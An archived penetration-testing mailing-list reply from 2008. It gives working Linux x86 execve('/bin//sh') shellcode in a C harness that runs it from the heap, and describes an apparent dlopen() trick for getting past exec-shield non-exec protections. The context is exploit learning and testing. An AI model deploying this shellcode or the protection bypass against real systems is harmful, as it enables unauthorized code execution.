Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: Simple Buffer Overflow (shell testing)
From: "Vuln Dev" <vulndev3 () gmail com>
Date: Tue, 15 Jan 2008 15:04:17 +0100

On 10 Jan 2008 02:09:46 -0000,  <loki6 () orange nl> wrote:

[snip]


- How do I test shellcode


Hi all.
Ironmonkey6, I tested your shellcode on my Fedora Core 7 and it did not work.
It seems to fail to correctly set %eax to 0xb and segfaults,
but could be my environment test is bad, infact go on ...
... for me worked this code:

--------------------------------8<-----------------------------------------
#include <dlfcn.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/shm.h>

char shellcode[23] =
 "\x6a\x0b"               // push   $0xb
 "\x58"                   // pop    %eax   // This push/pop sets %eax to 0x0b
 "\x99"                   // cltd
 "\x52"                   // push   %edx
 "\x68\x2f\x2f\x73\x68"   // push   $0x68732f2f
 "\x68\x2f\x62\x69\x6e"   // push   $0x6e69622f
 "\x89\xe3"               // mov    %esp,%ebx
 "\x52"                   // push   %edx
 "\x53"                   // push   %ebx
 "\x89\xe1"               // mov    %esp,%ecx
 "\xcd\x80";              // int    $0x80


main()
  {
  // ld-linux.so loosens attributes on non-exec
  // shared memory and heap?
  //
  dlopen("/lib/libm.so.6",RTLD_LAZY);

  // SHARED MEMORY: attach shm to addr
  //
  // int shmid;
  // void *addr;
  //
  // shmid=shmget(IPC_PRIVATE,200,0700);
  // addr=shmat(shmid,NULL,0700);

  // HEAP
  //
  void *addr;
  addr=malloc(23);

  memcpy(addr,shellcode,23);

  void (* f)();
  f=(void *)addr;
  f();
  }
--------------------------------8<-----------------------------------------

Curious about why the dlopen() stuff is just there?
No? Ok I'll tell anyway :)
I had some problems to bypass OS security settings
on non-exec stack and heap and shared memory (... and what else ..).
My pogram "correctly" showed no "wx" permissions in /proc/<pid>/maps so
I could not execute the shellcode in no other way than using inline assembly.
Strangely enough it turned out that the easiest way was calling dlopen() before
jumping into the heap.
Only my two cents, hope this helps.

Sorry for my bad English,
thankyou everybody,
Roberto.


Question: is anybody able to reproduce the same strange dlopen() behaviour?

/proc/sys/kernel/exec-shield-randomize is 1
and
/proc/sys/kernel/exec-shield is 1

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
  • Re: Simple Buffer Overflow (shell testing) Vuln Dev (Jan 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]